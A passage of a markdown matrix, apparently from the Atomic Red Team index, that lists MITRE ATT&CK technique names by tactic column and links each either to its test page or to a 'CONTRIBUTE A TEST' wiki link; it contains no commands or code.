| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Discovery](../../T1615/T1615.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Network Sniffing](../../T1040/T1040.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Application Window Discovery](../../T1010/T1010.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Active Setup](../../T1547.014/T1547.014.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Network Sniffing](../../T1040/T1040.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Data from Network Shared Drive](../../T1039/T1039.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
